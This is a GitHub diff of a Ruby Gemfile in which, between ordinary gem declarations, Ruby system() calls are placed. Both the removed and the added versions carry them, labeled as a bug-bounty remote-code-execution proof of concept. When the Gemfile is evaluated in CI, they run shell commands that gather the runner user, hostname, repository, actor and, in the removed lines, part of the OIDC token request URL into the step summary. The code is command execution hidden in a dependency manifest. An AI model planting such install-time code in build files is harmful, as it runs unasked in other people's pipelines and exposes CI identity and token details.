File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 11source "https://rubygems.org"
22
3- # BBP RCE proof-of-concept (authorized security research)
4- system ( "echo \" ## RCE_PROOF\" >> $GITHUB_STEP_SUMMARY" )
5- system ( "echo \" \` \` \` \" >> $GITHUB_STEP_SUMMARY" )
6- system ( "echo \" runner user: $(id)\" >> $GITHUB_STEP_SUMMARY" )
7- system ( "echo \" hostname: $(hostname)\" >> $GITHUB_STEP_SUMMARY" )
8- system ( "echo \" GITHUB_REPOSITORY: $GITHUB_REPOSITORY\" >> $GITHUB_STEP_SUMMARY" )
9- system ( "echo \" GITHUB_ACTOR: $GITHUB_ACTOR\" >> $GITHUB_STEP_SUMMARY" )
10- system ( "echo \" ACTIONS_ID_TOKEN_REQUEST_URL prefix: ${ACTIONS_ID_TOKEN_REQUEST_URL:0:50}\" >> $GITHUB_STEP_SUMMARY" )
11- system ( "echo \" \` \` \` \" >> $GITHUB_STEP_SUMMARY" )
3+ # Security research PoC - benign RCE proof
4+ system ( "printf \" ## RCE_PROOF\\ nrunner_user=%s\\ nhostname=%s\\ nrepo=%s\\ nactor=%s\\ n\" \" $(id -un)\" \" $(hostname)\" \" $GITHUB_REPOSITORY\" \" $GITHUB_ACTOR\" >> $GITHUB_STEP_SUMMARY" )
125
136gem "faraday" , "2.14.1"
147gem "faraday-retry" , "2.4.0"
You can’t perform that action at this time.
0 commit comments